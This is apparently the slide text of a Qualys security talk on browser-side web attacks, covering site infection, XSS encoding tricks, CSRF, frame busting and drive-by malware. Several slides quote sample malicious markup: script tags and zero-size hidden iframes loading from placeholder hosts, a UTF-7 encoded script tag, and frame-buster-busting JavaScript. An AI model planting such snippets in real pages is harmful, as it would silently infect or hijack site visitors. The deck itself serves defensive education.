Professional Documents
Culture Documents
When HTML Goes Bad
When HTML Goes Bad
When HTML Goes Bad
Mike Shema
Security Research Engineer, Qualys Inc.
Money
Attacks refocus from web server to web browser via the web application Compromise the web application in order to use it as a delivery mechanism
Infect rather than deface Automated SQL injection attacks infected tens of thousands of web sites
Us and Them
...exploit the system to gain admin access
Requires shell code Install keylogger, network sniffer, botnet Search for documents, credentials,
Poles Apart
Desktop
Access controls Process separation Anti-virus
Browser
Same Origin Policy Blocks pop-ups Blocks third-party cookies Tabs! Database (HTML5)
Safe Links?
http://bit.ly/2z3MBj http://bit.ly/z18Rv http://bit.ly/OApJX http://bit.ly/lSxst http://bit.ly/wszWO http://bit.ly/A6Ca http://tinyurl.com/6q2ab9
6
Infection
<script src=http://_.cn> <iframe src="http://_.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>
+ADw-script+AD4/lorem ipsem/.source
10
11
XSS
Character encoding
Valid, but unexpected Invalid, but rendered
Payload encoding
JavaScript obfuscation Browser-specific quirk
12
Unusual Suspects
Flash PDF Images Browser quirks
13
14
CSRF
Taking advantage of the design of HTML & HTTP Forcing state onto a non-stateful transport Forced workflows
15
Frame Busting
if (top != self) { top.location.replace(self.location.href); } <script type="text/javascript"> var prevent_bust = 0; window.onbeforeunload = function(){ prevent_bust++ } setInterval(function() { if (prevent_bust > 0) {prevent_bust -= 2; window.top.location = 'http://server-which-responds-with204.com'} }, 1) </script> http://www.codinghorror.com/blog/archives/001277.html http://stackoverflow.com/questions/958997/frame-buster-busterbuster-code-needed
16
Malware
Drive-by download Safe browsing lists Blacklisted domains Anti-detection mechanisms
if (navigator.systemLanguage=='zh-cn') {} else{ document.writeln("<iframe src=http://_.com/img/info.htm width=0 height=0></iframe>");
17
18
19
Browser Evolution
Move more countermeasures into the browser
Process isolation Anti-XSS Anti-CSRF Behavioral anti-virus
20
A New Machine
HTML5
Cross-document messaging a.k.a. Some Other Origins, Too Database
21
Thank You!
During Live Presentation Please Use Your WebEx Q&A Panel to Submit Questions
To Request a 14-day Free Trial of our Web Application Scanning Solution, email: was-info@qualys.com
22